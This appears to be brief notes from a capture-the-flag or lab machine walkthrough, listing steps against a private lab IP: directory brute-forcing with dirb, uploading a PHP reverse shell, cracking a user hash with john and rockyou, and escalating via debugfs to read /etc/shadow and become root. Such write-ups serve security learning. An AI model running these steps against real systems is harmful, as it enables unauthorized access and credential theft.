80

Trying dirb:

dirb http://192.168.236.16

Now upload a php-reverse-shell.php:

http://192.168.236.16/shell.php

We can crack the dora hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

So now checking the disk / is mounted on:

df -h
debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
cat /etc/shadow
su root

Last updated